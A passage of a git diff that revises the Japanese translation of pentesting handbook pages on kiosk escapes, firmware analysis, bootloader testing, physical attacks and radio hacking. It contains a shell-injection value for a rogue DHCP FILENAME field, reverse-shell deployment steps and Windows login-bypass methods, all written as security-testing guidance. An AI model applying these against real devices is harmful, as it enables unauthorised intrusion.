+詳細についてはこのページを確認してください：[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
 
 # ブラウザのトリック
 
-iKatのバックアップバージョン:
+バックアップiKatバージョン：
 
 [http://swin.es/k/](http://swin.es/k/)\
 [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
 
-JavaScriptを使用して一般的なダイアログを作成し、ファイルエクスプローラーにアクセスする: `document.write('<input/type=file>')`
-出典: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
+JavaScriptを使用して一般的なダイアログを作成し、ファイルエクスプローラーにアクセスします：`document.write('<input/type=file>')`
+出典：https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
 
 # iPad
 
 ## ジェスチャーとボタン
 
-- 四本（または五本）の指で上にスワイプ / ホームボタンをダブルタップ: マルチタスクビューを表示し、アプリを変更する
+- 四本（または五本）の指で上にスワイプ / ホームボタンをダブルタップ：マルチタスクビューを表示し、アプリを変更する
 
-- 四本または五本の指で一方の方向にスワイプ: 次の/前のアプリに切り替える
+- 四本または五本の指で一方の方向にスワイプ：次の/前のアプリに切り替える
 
-- 五本の指で画面をピンチ / ホームボタンをタッチ / 画面の下から1本の指で素早く上にスワイプ: ホームにアクセスする
+- 五本の指で画面をピンチ / ホームボタンをタッチ / 画面の下から1本の指で素早く上にスワイプ：ホームにアクセスする
 
-- 画面の下から1本の指で1-2インチスワイプ（遅く）: ドックが表示される
+- 画面の下から1本の指で1-2インチスワイプ（遅く）：ドックが表示される
 
-- 画面の上端から1本の指でスワイプ: 通知を表示する
+- 画面の上部から1本の指でスワイプダウン：通知を表示する
 
-- 画面の右上隅から1本の指でスワイプ: iPad Proのコントロールセンターを表示する
+- 画面の右上隅から1本の指でスワイプダウン：iPad Proのコントロールセンターを表示する
 
-- 画面の左から1本の指で1-2インチスワイプ: 今日のビューを表示する
+- 画面の左から1本の指で1-2インチスワイプ：今日のビューを表示する
 
-- 画面の中心から右または左に1本の指で素早くスワイプ: 次の/前のアプリに切り替える
+- 画面の中央から右または左に1本の指で素早くスワイプ：次の/前のアプリに切り替える
 
-- 上部右隅の**iPad +**のオン/**オフ**/スリープボタンを押し続け、**電源オフ**スライダーを右にスライド: 電源を切る
+- 上部右隅の**iPad +**の電源ボタンを押し続け、**電源オフ**スライダーを右にスライドさせる：電源を切る
 
-- 上部右隅の**iPad**のオン/**オフ**/スリープボタンとホームボタンを数秒間押す: ハード電源オフを強制する
+- 上部右隅の**iPad**の電源ボタンとホームボタンを数秒間押す：強制的にハード電源オフする
 
-- 上部右隅の**iPad**のオン/**オフ**/スリープボタンとホームボタンを素早く押す: スクリーンショットを撮影し、表示の左下にポップアップします。両方のボタンを同時に非常に短時間押すと、数秒間保持するとハード電源オフが実行されます。
+- 上部右隅の**iPad**の電源ボタンとホームボタンを素早く押す：スクリーンショットを撮影し、表示の左下にポップアップします。両方のボタンを同時に非常に短時間押すと、数秒間保持するとハード電源オフが実行されます。
 
 ## ショートカット
 
-iPadキーボードまたはUSBキーボードアダプタを持っている必要があります。アプリケーションからの脱出に役立つショートカットのみがここに表示されます。
+iPadキーボードまたはUSBキーボードアダプタが必要です。アプリケーションからの脱出に役立つショートカットのみがここに表示されます。
 
 | Key | Name         |
 | --- | ------------ |
@@ -208,7 +208,7 @@ iPadキーボードまたはUSBキーボードアダプタを持っている必
 | F10      | ミュート                                                                       |
 | F11      | 音量を下げる                                                                  |
 | F12      | 音量を上げる                                                                  |
-| ⌘ Space  | 利用可能な言語のリストを表示; 1つを選択するには、スペースバーを再度タップします。 |
+| ⌘ Space  | 利用可能な言語のリストを表示；1つを選択するには、スペースバーを再度タップします。 |
 
 ### iPadナビゲーション
 
@@ -216,12 +216,12 @@ iPadキーボードまたはUSBキーボードアダプタを持っている必
 | -------------------------------------------------- | ------------------------------------------------------- |
 | ⌘H                                                 | ホームに移動                                            |
 | ⌘⇧H (Command-Shift-H)                              | ホームに移動                                            |
-| ⌘ (Space)                                          | スポットライトを開く                                    |
+| ⌘ (Space)                                          | Spotlightを開く                                        |
 | ⌘⇥ (Command-Tab)                                   | 最後に使用したアプリのリストを表示                     |
 | ⌘\~                                                | 最後のアプリに移動                                     |
 | ⌘⇧3 (Command-Shift-3)                              | スクリーンショット（保存またはアクションを実行するために左下にホバー） |
 | ⌘⇧4                                                | スクリーンショットを撮影し、エディタで開く              |
-| ⌘を押し続ける                                      | アプリのための利用可能なショートカットのリスト          |
+| ⌘を押し続ける                                      | アプリのための利用可能なショートカットのリストを表示     |
 | ⌘⌥D (Command-Option/Alt-D)                         | ドックを表示                                            |
 | ^⌥H (Control-Option-H)                             | ホームボタン                                            |
 | ^⌥H H (Control-Option-H-H)                         | マルチタスクバーを表示                                  |
@@ -230,9 +230,9 @@ iPadキーボードまたはUSBキーボードアダプタを持っている必
 | → (右矢印)                                        | 次のアイテム                                            |
 | ← (左矢印)                                        | 前のアイテム                                            |
 | ↑↓ (上矢印、下矢印)                               | 選択したアイテムを同時にタップ                          |
-| ⌥ ↓ (Option-Down arrow)                            | 下にスクロール                                          |
-| ⌥↑ (Option-Up arrow)                               | 上にスクロール                                          |
-| ⌥←または⌥→ (Option-Left arrowまたはOption-Right arrow) | 左または右にスクロール                                   |
+| ⌥ ↓ (Option-Down矢印)                            | 下にスクロール                                          |
+| ⌥↑ (Option-Up矢印)                               | 上にスクロール                                          |
+| ⌥←または⌥→ (Option-Left矢印またはOption-Right矢印) | 左または右にスクロール                                   |
 | ^⌥S (Control-Option-S)                             | VoiceOverの音声をオンまたはオフにする                   |
 | ⌘⇧⇥ (Command-Shift-Tab)                            | 前のアプリに切り替える                                  |
 | ⌘⇥ (Command-Tab)                                   | 元のアプリに戻る                                       |
@@ -242,18 +242,18 @@ iPadキーボードまたはUSBキーボードアダプタを持っている必
 
 | Shortcut                | Action                                           |
 | ----------------------- | ------------------------------------------------ |
-| ⌘L (Command-L)          | ロケーションを開く                              |
+| ⌘L (Command-L)          | ロケーションを開く                               |
 | ⌘T                      | 新しいタブを開く                                 |
-| ⌘W                      | 現在のタブを閉じる                              |
-| ⌘R                      | 現在のタブを更新する                            |
-| ⌘.                      | 現在のタブの読み込みを停止する                  |
-| ^⇥                      | 次のタブに切り替える                            |
-| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動する                              |
-| ⌘L                      | テキスト入力/URLフィールドを選択して修正する    |
+| ⌘W                      | 現在のタブを閉じる                               |
+| ⌘R                      | 現在のタブを更新する                             |
+| ⌘.                      | 現在のタブの読み込みを停止する                   |
+| ^⇥                      | 次のタブに切り替える                             |
+| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動                                   |
+| ⌘L                      | テキスト入力/URLフィールドを選択して修正する     |
 | ⌘⇧T (Command-Shift-T)   | 最後に閉じたタブを開く（何度でも使用可能）      |
-| ⌘\[                     | ブラウジング履歴で1ページ戻る                   |
-| ⌘]                      | ブラウジング履歴で1ページ進む                   |
-| ⌘⇧R                     | リーダーモードを有効にする                      |
+| ⌘\[                     | ブラウジング履歴で1ページ戻る                    |
+| ⌘]                      | ブラウジング履歴で1ページ進む                    |
+| ⌘⇧R                     | リーダーモードを有効にする                       |
 
 ### メールショートカット
 
@@ -263,7 +263,7 @@ iPadキーボードまたはUSBキーボードアダプタを持っている必
 | ⌘T                         | 新しいタブを開く            |
 | ⌘W                         | 現在のタブを閉じる          |
 | ⌘R                         | 現在のタブを更新する        |
-| ⌘.                         | 現在のタブの読み込みを停止  |
+| ⌘.                         | 現在のタブの読み込みを停止する |
 | ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索する  |
 
 # 参考文献
diff --git a/src/physical-attacks/firmware-analysis/README.md b/src/physical-attacks/firmware-analysis/README.md
index 0be8faa67..ba4c298a0 100644
--- a/src/physical-attacks/firmware-analysis/README.md
+++ b/src/physical-attacks/firmware-analysis/README.md
@@ -10,7 +10,7 @@
 
 **情報収集**は、デバイスの構成や使用されている技術を理解するための重要な初期ステップです。このプロセスには、以下のデータを収集することが含まれます：
 
-- 実行されているCPUアーキテクチャとオペレーティングシステム
+- CPUアーキテクチャと実行されているオペレーティングシステム
 - ブートローダーの詳細
 - ハードウェアのレイアウトとデータシート
 - コードベースのメトリクスとソースの場所
@@ -26,7 +26,7 @@
 ファームウェアを取得する方法はいくつかあり、それぞれ異なる複雑さがあります：
 
 - **直接**ソース（開発者、製造業者）から
-- 提供された指示から**構築**する
+- 提供された指示から**ビルド**する
 - 公式サポートサイトから**ダウンロード**する
 - ホストされたファームウェアファイルを見つけるために**Google dork**クエリを利用する
 - [S3Scanner](https://github.com/sa7mon/S3Scanner)のようなツールを使って**クラウドストレージ**に直接アクセスする
@@ -39,7 +39,7 @@
 
 ## ファームウェアの分析
 
-今や**ファームウェアを持っている**ので、それについての情報を抽出してどのように扱うかを知る必要があります。それに使用できるさまざまなツールがあります：
+今や**ファームウェアを持っている**ので、それについての情報を抽出してどのように扱うかを知る必要があります。それに使用できるさまざまなツール：
 ```bash
 file <bin>
 strings -n8 <bin>
@@ -48,7 +48,7 @@ hexdump -C -n 512 <bin> > hexdump.out
 hexdump -C <bin> | head # might find signatures in header
 fdisk -lu <bin> #lists a drives partition and filesystems if multiple
 ```
-画像の**エントロピー**を`binwalk -E <bin>`で確認し、エントロピーが低い場合は暗号化されていない可能性が高いです。エントロピーが高い場合は、暗号化されている（または何らかの方法で圧縮されている）可能性があります。
+画像の**エントロピー**を`binwalk -E <bin>`で確認し、エントロピーが低ければ、暗号化されている可能性は低いです。エントロピーが高ければ、暗号化されている（または何らかの方法で圧縮されている）可能性があります。
 
 さらに、これらのツールを使用して**ファームウェア内に埋め込まれたファイル**を抽出できます：
 
@@ -95,17 +95,17 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 `$ unsquashfs dir.squashfs`
 
-ファイルはその後"`squashfs-root`"ディレクトリにあります。
+ファイルはその後「`squashfs-root`」ディレクトリにあります。
 
 - CPIOアーカイブファイル
 
 `$ cpio -ivd --no-absolute-filenames -F <bin>`
 
-- jffs2ファイルシステムの場合
+- jffs2ファイルシステム用
 
 `$ jefferson rootfsfile.jffs2`
 
-- NANDフラッシュを使用したubifsファイルシステムの場合
+- NANDフラッシュを使用したubifsファイルシステム用
 
 `$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
 
@@ -117,7 +117,7 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 ### 初期分析ツール
 
-バイナリファイル（`<bin>`と呼ばれる）の初期検査のために一連のコマンドが提供されています。これらのコマンドは、ファイルタイプの特定、文字列の抽出、バイナリデータの分析、およびパーティションとファイルシステムの詳細を理解するのに役立ちます：
+バイナリファイル（`<bin>`と呼ばれる）の初期検査のためのコマンドセットが提供されています。これらのコマンドは、ファイルタイプの特定、文字列の抽出、バイナリデータの分析、パーティションおよびファイルシステムの詳細の理解に役立ちます：
 ```bash
 file <bin>
 strings -n8 <bin>
@@ -142,7 +142,7 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 ### ファイルシステム分析
 
-ファイルシステムが抽出されると、セキュリティの欠陥を探し始めます。注意が払われるのは、安全でないネットワークデーモン、ハードコーディングされた資格情報、APIエンドポイント、更新サーバー機能、未コンパイルのコード、スタートアップスクリプト、オフライン分析用のコンパイル済みバイナリです。
+ファイルシステムが抽出されると、セキュリティの欠陥を探し始めます。注意が払われるのは、安全でないネットワークデーモン、ハードコーディングされた資格情報、APIエンドポイント、更新サーバー機能、未コンパイルのコード、スタートアップスクリプト、およびオフライン分析用のコンパイル済みバイナリです。
 
 **確認すべき主要な場所**と**項目**には以下が含まれます：
 
@@ -180,31 +180,31 @@ file ./squashfs-root/bin/busybox
 ```bash
 sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
 ```
-For MIPS (ビッグエンディアン)、`qemu-mips`が使用され、リトルエンディアンバイナリの場合は`qemu-mipsel`が選択されます。
+MIPS（ビッグエンディアン）には `qemu-mips` が使用され、リトルエンディアンバイナリには `qemu-mipsel` が選択されます。
 
 #### ARMアーキテクチャエミュレーション
 
-ARMバイナリの場合、プロセスは似ており、エミュレーションには`qemu-arm`エミュレーターが利用されます。
+ARMバイナリの場合、プロセスは似ており、エミュレーションには `qemu-arm` エミュレーターが利用されます。
 
 ### フルシステムエミュレーション
 
-[Firmadyne](https://github.com/firmadyne/firmadyne)、[Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit)などのツールは、フルファームウェアエミュレーションを容易にし、プロセスを自動化し、動的分析を支援します。
+[Firmadyne](https://github.com/firmadyne/firmadyne)、[Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) などのツールは、フルファームウェアエミュレーションを容易にし、プロセスを自動化し、動的分析を支援します。
 
 ## 実践における動的分析
 
-この段階では、実際のデバイス環境またはエミュレートされたデバイス環境が分析に使用されます。OSとファイルシステムへのシェルアクセスを維持することが重要です。エミュレーションはハードウェアの相互作用を完全に模倣できない場合があるため、時折エミュレーションを再起動する必要があります。分析はファイルシステムを再訪し、公開されたウェブページやネットワークサービスを悪用し、ブートローダの脆弱性を探るべきです。ファームウェアの整合性テストは、潜在的なバックドアの脆弱性を特定するために重要です。
+この段階では、実際のデバイス環境またはエミュレートされたデバイス環境が分析に使用されます。OSおよびファイルシステムへのシェルアクセスを維持することが重要です。エミュレーションはハードウェアの相互作用を完全に模倣できない場合があるため、時折エミュレーションの再起動が必要です。分析はファイルシステムを再訪し、公開されたウェブページやネットワークサービスを悪用し、ブートローダーの脆弱性を探るべきです。ファームウェアの整合性テストは、潜在的なバックドアの脆弱性を特定するために重要です。
 
 ## 実行時分析技術
 
-実行時分析は、gdb-multiarch、Frida、Ghidraなどのツールを使用して、プロセスやバイナリとその動作環境で相互作用し、ブレークポイントを設定し、ファジングやその他の技術を通じて脆弱性を特定します。
+実行時分析は、gdb-multiarch、Frida、Ghidraなどのツールを使用して、プロセスまたはバイナリとその動作環境で相互作用し、ブレークポイントを設定し、ファジングやその他の技術を通じて脆弱性を特定します。
 
 ## バイナリの悪用と概念実証
 
-特定された脆弱性のPoCを開発するには、ターゲットアーキテクチャと低レベル言語でのプログラミングに関する深い理解が必要です。組み込みシステムにおけるバイナリ実行時保護は稀ですが、存在する場合は、Return Oriented Programming (ROP)のような技術が必要になることがあります。
+特定された脆弱性のPoCを開発するには、ターゲットアーキテクチャの深い理解と低レベル言語でのプログラミングが必要です。組み込みシステムにおけるバイナリ実行時保護は稀ですが、存在する場合は、Return Oriented Programming（ROP）などの技術が必要になることがあります。
 
 ## ファームウェア分析のための準備されたオペレーティングシステム
 
-[AttifyOS](https://github.com/adi0x90/attifyos)や[EmbedOS](https://github.com/scriptingxss/EmbedOS)のようなオペレーティングシステムは、必要なツールを備えたファームウェアセキュリティテストのための事前構成された環境を提供します。
+[AttifyOS](https://github.com/adi0x90/attifyos) や [EmbedOS](https://github.com/scriptingxss/EmbedOS) などのオペレーティングシステムは、必要なツールを備えたファームウェアセキュリティテストのための事前構成された環境を提供します。
 
 ## ファームウェアを分析するための準備されたOS
 
diff --git a/src/physical-attacks/firmware-analysis/bootloader-testing.md b/src/physical-attacks/firmware-analysis/bootloader-testing.md
index b67124618..aa439d978 100644
--- a/src/physical-attacks/firmware-analysis/bootloader-testing.md
+++ b/src/physical-attacks/firmware-analysis/bootloader-testing.md
@@ -30,7 +30,7 @@
 
 4. **`ubootwrite.py`の利用**：
 
-- `ubootwrite.py`を使用してU-bootイメージを書き込み、ルートアクセスを得るために修正されたファームウェアをプッシュします。
+- `ubootwrite.py`を使用してU-bootイメージを書き込み、修正されたファームウェアをプッシュしてルートアクセスを取得します。
 
 5. **デバッグ機能の確認**：
 
@@ -38,12 +38,12 @@
 
 6. **注意が必要なハードウェア干渉**：
 
-- デバイスのブートアップシーケンス中、特にカーネルが解凍される前に、1つのピンをグラウンドに接続し、SPIまたはNANDフラッシュチップと相互作用する際には注意が必要です。ピンをショートする前にNANDフラッシュチップのデータシートを参照してください。
+- デバイスのブートアップシーケンス中、特にカーネルが解凍される前に、1つのピンをグラウンドに接続し、SPIまたはNANDフラッシュチップと相互作用する際は注意が必要です。ピンをショートする前にNANDフラッシュチップのデータシートを参照してください。
 
 7. **悪意のあるDHCPサーバーの設定**：
 - PXEブート中にデバイスが取り込む悪意のあるパラメータを持つ悪意のあるDHCPサーバーを設定します。Metasploitの（MSF）DHCP補助サーバーなどのツールを利用します。'FILENAME'パラメータをコマンドインジェクションコマンド（例：`'a";/bin/sh;#'`）で変更し、デバイスの起動手順に対する入力検証をテストします。
 
-**注意**：デバイスのピンとの物理的相互作用を伴う手順（\*アスタリスクでマークされたもの）は、デバイスを損傷しないように極めて注意して行うべきです。
+**注意**：デバイスのピンとの物理的な相互作用を伴う手順（\*アスタリスクでマークされたもの）は、デバイスを損傷しないように極めて注意して行うべきです。
 
 ## 参考文献
 
diff --git a/src/physical-attacks/firmware-analysis/firmware-integrity.md b/src/physical-attacks/firmware-analysis/firmware-integrity.md
index 937a2f47b..14053cc5c 100644
--- a/src/physical-attacks/firmware-analysis/firmware-integrity.md
+++ b/src/physical-attacks/firmware-analysis/firmware-integrity.md
@@ -20,10 +20,10 @@
 
 1. 対象のファームウェアアーキテクチャとエンディアンネスを特定する必要があります。
 2. Msfvenomを使用して、ターゲットペイロード、攻撃者ホストIP、リスニングポート番号、ファイルタイプ、アーキテクチャ、プラットフォーム、および出力ファイルを指定できます。
-3. ペイロードは侵害されたデバイスに転送され、実行権限があることを確認します。
+3. ペイロードは侵害されたデバイスに転送され、実行権限があることを確認する必要があります。
 4. Metasploitはmsfconsoleを起動し、ペイロードに応じて設定を構成することで、受信リクエストを処理する準備をします。
-5. Meterpreterリバースシェルは侵害されたデバイスで実行できます。
-6. Meterpreterセッションは開くときに監視できます。
+5. 侵害されたデバイスでmeterpreterリバースシェルを実行できます。
+6. meterpreterセッションが開くときに監視できます。
 7. ポストエクスプロイト活動を実行できます。
 
 可能であれば、起動スクリプト内の脆弱性を悪用して、再起動を通じてデバイスへの持続的なアクセスを取得できます。これらの脆弱性は、起動スクリプトが信頼できないマウントされた場所（SDカードやルートファイルシステムの外にデータを保存するために使用されるフラッシュボリュームなど）にあるコードを参照、[シンボリックリンク](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)または依存する場合に発生します。
diff --git a/src/physical-attacks/physical-attacks.md b/src/physical-attacks/physical-attacks.md
index 224ef6e8f..be8803241 100644
--- a/src/physical-attacks/physical-attacks.md
+++ b/src/physical-attacks/physical-attacks.md
@@ -4,7 +4,7 @@
 
 ## BIOSパスワードの回復とシステムセキュリティ
 
-**BIOSのリセット**は、いくつかの方法で実行できます。ほとんどのマザーボードには**バッテリー**が含まれており、これを約**30分**取り外すことで、パスワードを含むBIOS設定がリセットされます。あるいは、**マザーボード上のジャンパー**を調整して、特定のピンを接続することでこれらの設定をリセットできます。
+**BIOSのリセット**は、いくつかの方法で実行できます。ほとんどのマザーボードには**バッテリー**が含まれており、これを約**30分**取り外すことで、パスワードを含むBIOS設定がリセットされます。あるいは、**マザーボード上のジャンパー**を調整して、特定のピンを接続することでこれらの設定をリセットすることもできます。
 
 ハードウェアの調整が不可能または実用的でない場合、**ソフトウェアツール**が解決策を提供します。**Kali Linux**のようなディストリビューションを使用して**Live CD/USB**からシステムを実行することで、BIOSパスワードの回復を支援する**_killCmos_**や**_CmosPWD_**のようなツールにアクセスできます。
 
@@ -18,7 +18,7 @@ BIOSパスワードが不明な場合、通常、3回間違って入力すると
 
 ### RAM分析とコールドブート攻撃
 
-RAMは電源が切れた後、通常**1〜2分**間データを保持します。この持続性は、液体窒素のような冷却物質を適用することで**10分**に延長できます。この延長された期間中に、**dd.exe**や**volatility**のようなツールを使用して**メモリダンプ**を作成し、分析できます。
+RAMは電源が切れた後、通常**1〜2分**間データを保持します。この持続性は、液体窒素のような冷却物質を適用することで**10分**に延長できます。この延長された期間中に、**dd.exe**や**volatility**のようなツールを使用して**メモリダンプ**を作成し、分析することができます。
 
 ### ダイレクトメモリアクセス（DMA）攻撃
 
@@ -26,9 +26,9 @@ RAMは電源が切れた後、通常**1〜2分**間データを保持します
 
 ### システムアクセスのためのLive CD/USB
 
-**_sethc.exe_**や**_Utilman.exe_**のようなシステムバイナリを**_cmd.exe_**のコピーで変更することで、システム権限を持つコマンドプロンプトを提供できます。**chntpw**のようなツールを使用して、Windowsインストールの**SAM**ファイルを編集し、パスワードを変更できます。
+**_sethc.exe_**や**_Utilman.exe_**のようなシステムバイナリを**_cmd.exe_**のコピーで変更することで、システム権限を持つコマンドプロンプトを提供できます。**chntpw**のようなツールを使用して、Windowsインストールの**SAM**ファイルを編集し、パスワードを変更することができます。
 
-**Kon-Boot**は、WindowsカーネルまたはUEFIを一時的に変更することで、パスワードを知らなくてもWindowsシステムにログインできるツールです。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
+**Kon-Boot**は、WindowsカーネルやUEFIを一時的に変更することで、パスワードを知らなくてもWindowsシステムにログインできるツールです。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
 
 ### Windowsセキュリティ機能の取り扱い
 
diff --git a/src/radio-hacking/low-power-wide-area-network.md b/src/radio-hacking/low-power-wide-area-network.md
index 0f52b9549..51c8ecf34 100644
--- a/src/radio-hacking/low-power-wide-area-network.md
+++ b/src/radio-hacking/low-power-wide-area-network.md
@@ -5,7 +5,7 @@
 ## はじめに
 
 **低電力広域ネットワーク** (LPWAN) は、**長距離通信**のために設計された無線の低電力広域ネットワーク技術のグループです。\
-これらは**6マイル**以上の距離に到達でき、**バッテリー**は最大で**20年**持続します。
+これらは**6マイル**以上の距離に到達でき、**バッテリー**は最大で**20年**持続することができます。
 
 ロングレンジ (**LoRa**) は複数の国で人気があり、**LoRaWAN**というオープンソースの仕様があります。
 
diff --git a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index ec7e1f542..e37b720b4 100644
--- a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -6,15 +6,15 @@ Bluetooth 4.0仕様以来、BLEは40チャネルのみを使用し、2400から2
 
 BLEデバイスは、**広告パケット**（**ビーコンサ**）を送信することで通信します。これらのパケットは、BLEデバイスの存在を他の近くのデバイスにブロードキャストします。これらのビーコンは時々**データ**も**送信**します。
 
-リスニングデバイス、または中央デバイスと呼ばれるものは、広告デバイスに特に送信された**SCANリクエスト**で広告パケットに応答できます。そのスキャンへの**応答**は、完全なデバイス名など、最初の広告リクエストに収まらなかった追加情報を含む**広告**パケットと同じ構造を使用します。
+リスニングデバイス、または中央デバイスと呼ばれるデバイスは、広告パケットに対して**SCANリクエスト**を送信することで応答できます。このスキャンへの**応答**は、**広告**パケットと同じ構造を持ち、初期の広告リクエストに収まらなかった追加情報（完全なデバイス名など）を含みます。
 
 ![](<../images/image (201) (2) (1) (1).png>)
 
-プレアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは**接続識別子**であり、複数のデバイスが同じチャネルで接続を確立しようとするシナリオで使用されます。次に、プロトコルデータユニット（**PDU**）には**広告データ**が含まれています。PDUにはいくつかのタイプがあり、最も一般的に使用されるのはADV_NONCONN_INDとADV_INDです。デバイスは**接続を受け付けない**場合、広告パケット内でのみデータを送信し、**ADV_NONCONN_IND** PDUタイプを使用します。デバイスは**接続を許可する**場合、**接続**が**確立**されると広告パケットの送信を**停止**し、**ADV_IND**を使用します。
+プレアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは**接続識別子**であり、複数のデバイスが同じチャネルで接続を確立しようとするシナリオで使用されます。次に、プロトコルデータユニット（**PDU**）は**広告データ**を含みます。PDUにはいくつかのタイプがあり、最も一般的に使用されるのはADV_NONCONN_INDとADV_INDです。デバイスは**接続を受け付けない**場合、**ADV_NONCONN_IND** PDUタイプを使用し、広告パケット内でのみデータを送信します。デバイスは**接続を許可する**場合、**ADV_IND**を使用し、**接続**が**確立**されると広告パケットの送信を停止します。
 
 ## GATT
 
-**汎用属性プロファイル**（GATT）は、**デバイスがデータをフォーマットし転送する方法**を定義します。BLEデバイスの攻撃面を分析する際、GATT（またはGATTs）に注意を集中させることがよくあります。なぜなら、それが**デバイス機能をトリガーする方法**であり、データがどのように保存、グループ化、変更されるかを示すからです。GATTは、デバイスの特性、記述子、およびサービスを16ビットまたは32ビットの値として表形式でリストします。**特性**は、中央デバイスと周辺デバイスの間で**送信される**データ値です。これらの特性には、**追加情報を提供する**記述子を持つことがあります。**特性**は、特定のアクションを実行することに関連している場合、**サービス**に**グループ化**されることがよくあります。
+**汎用属性プロファイル**（GATT）は、**デバイスがデータをフォーマットし転送する方法**を定義します。BLEデバイスの攻撃面を分析する際、GATT（またはGATTs）に注意を集中させることが多いです。なぜなら、これが**デバイス機能をトリガーする方法**であり、データが保存、グループ化、変更される方法だからです。GATTは、デバイスの特性、記述子、およびサービスを16ビットまたは32ビットの値として表形式でリストします。**特性**は、中央デバイスと周辺デバイスの間で**送信される**データ値です。これらの特性には、**追加情報を提供する**記述子を持つことがあります。**特性**は、特定のアクションを実行することに関連している場合、**サービス**に**グループ化**されることがよくあります。
 
 # 列挙
 ```bash
diff --git a/src/radio-hacking/pentesting-rfid.md b/src/radio-hacking/pentesting-rfid.md
index f23e7976e..2031affd2 100644
--- a/src/radio-hacking/pentesting-rfid.md
+++ b/src/radio-hacking/pentesting-rfid.md
@@ -17,7 +17,7 @@ EPCglobalはRFIDタグを6つのカテゴリに分けています。各カテゴ
 - **Class 2**タグは、**複数回書き込むことができます**。
 - **Class 3**タグは、現在の温度やタグの動きなどの環境パラメータを記録できる**埋め込みセンサー**を含むことができます。これらのタグは**セミパッシブ**で、埋め込まれた電源（統合された**バッテリー**など）を持っていますが、他のタグやリーダーとの無線**通信を開始することはできません**。
 - **Class 4**タグは、同じクラスの他のタグとの通信を開始できるため、**アクティブタグ**です。
-- **Class 5**タグは、他のタグに**電力を供給し、すべての前のタグ**クラスと通信できます。Class 5タグは**RFIDリーダー**として機能することができます。
+- **Class 5**タグは、他のタグに**電力を供給し、すべての前のタグ**クラスと通信できます。Class 5タグは**RFIDリーダー**として機能できます。
 
 ### Information Stored in RFID Tags
 
@@ -33,18 +33,18 @@ ISO標準は、タグが属する**オブジェクトの種類**を示すコー
 
 ## Low-Frequency RFID Tags (125kHz)
 
-**低周波タグ**は、**高いセキュリティを必要としない**システムでよく使用されます：建物のアクセス、インターホンキー、ジムの会員カードなど。より高い範囲のため、支払い駐車場での使用に便利です：ドライバーはカードをリーダーの近くに持ってくる必要がなく、遠くからトリガーされます。同時に、低周波タグは非常に原始的で、データ転送速度が低いです。そのため、残高の保持や暗号化などの複雑な双方向データ転送を実装することは不可能です。低周波タグは、認証手段なしで短いIDを送信するだけです。
+**低周波タグ**は、**高いセキュリティを必要としない**システムでよく使用されます：建物のアクセス、インターホンキー、ジムの会員カードなど。より高い範囲のため、支払い駐車場での使用に便利です：ドライバーはカードをリーダーに近づける必要がなく、遠くからトリガーされます。同時に、低周波タグは非常に原始的で、データ転送速度が低いです。そのため、残高の保持や暗号化などの複雑な双方向データ転送を実装することは不可能です。低周波タグは、認証手段なしで短いIDを送信するだけです。
 
 これらのデバイスは**パッシブ****RFID**技術に依存し、**30 kHzから300 kHzの範囲**で動作しますが、125 kHzから134 kHzを使用するのが一般的です：
 
 - **ロングレンジ** — 低い周波数は高い範囲に変換されます。EM-MarinやHIDリーダーの中には、1メートルの距離から動作するものがあります。これらは駐車場でよく使用されます。
-- **原始的なプロトコル** — 低いデータ転送速度のため、これらのタグは短いIDしか送信できません。ほとんどの場合、データは認証されず、何の保護もありません。カードがリーダーの範囲に入ると、ただIDを送信し始めます。
+- **原始的なプロトコル** — 低いデータ転送速度のため、これらのタグは短いIDしか送信できません。ほとんどの場合、データは認証されず、何の保護もされていません。カードがリーダーの範囲に入ると、ただIDを送信し始めます。
 - **低いセキュリティ** — これらのカードは簡単にコピーでき、プロトコルの原始性のために他の人のポケットからでも読み取られる可能性があります。
 
 **人気のある125 kHzプロトコル：**
 
-- **EM-Marin** — EM4100、EM4102。CISで最も人気のあるプロトコル。シンプルさと安定性のため、約1メートルの距離から読み取ることができます。
-- **HID Prox II** — HID Globalによって導入された低周波プロトコル。このプロトコルは西洋諸国でより人気があります。より複雑で、このプロトコル用のカードとリーダーは比較的高価です。
+- **EM-Marin** — EM4100、EM4102。CISで最も人気のあるプロトコル。シンプルさと安定性のため、約1メートルから読み取ることができます。
+- **HID Prox II** — HID Globalによって導入された低周波プロトコル。このプロトコルは西洋諸国でより人気があります。より複雑で、このプロトコルのカードとリーダーは比較的高価です。
 - **Indala** — Motorolaによって導入された非常に古い低周波プロトコルで、後にHIDに買収されました。前の2つと比べて、使用されることは少なくなっています。
 
 実際には、もっと多くの低周波プロトコルがあります。しかし、すべて同じ物理層の変調を使用し、上記のもののいずれかのバリエーションと見なすことができます。
@@ -62,19 +62,19 @@ You can **attack these Tags with the Flipper Zero**:
 **高周波タグ**は、暗号化、大規模な双方向データ転送、認証などが必要なより複雑なリーダーとタグの相互作用に使用されます。\
 通常、銀行カード、公共交通機関、その他のセキュアパスで見られます。
 
